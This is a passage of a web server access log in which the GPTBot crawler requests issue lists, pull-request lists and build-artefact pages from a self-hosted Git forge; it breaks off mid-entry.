"/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11311] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:19:27:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:27:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:27:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10067] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:28:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:28:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:28:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:28:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 11171] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/Analysis-00.toc" -[17/Feb/2026:19:28:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 10950] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" -[17/Feb/2026:19:28:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 10952] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" -[17/Feb/2026:19:28:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11431] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:19:28:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11433] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:19:28:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11434] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:19:28:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 10918] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" -[17/Feb/2026:19:28:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 10950] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" -[17/Feb/2026:19:28:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11402] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:19:28:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 10921] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" -[17/Feb/2026:19:28:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 10919] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" -[17/Feb/2026:19:28:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=farduedate&state=open&type=all" -[17/Feb/2026:19:28:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:28:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:28:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:28:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:28:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:28:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 59995] [Gzip 16.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" -[17/Feb/2026:19:28:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:28:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:28:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:28:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:28:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:28:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/data_format.hpp?display=source" [Client 74.7.227.38] [Length 12278] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:19:28:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3.12?display=rendered" [Client 74.7.227.38] [Length 11221] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3.12" -[17/Feb/2026:19:28:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:28:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:28:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:28:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:28:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:28:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:28:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:28:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:28:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:28:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:28:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:28:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=closed&type=all" -[17/Feb/2026:19:28:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=closed&type=all" -[17/Feb/2026:19:28:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig?display=source" [Client 74.7.227.38] [Length 11810] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" -[17/Feb/2026:19:28:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt?display=rendered" [Client 74.7.227.38] [Length 11019] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:19:28:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt?display=source" [Client 74.7.227.38] [Length 12558] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:19:28:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt?display=rendered" [Client 74.7.227.38] [Length 11019] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:19:28:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10160] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:28:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:28:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10159] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:28:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10164] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:28:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:28:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 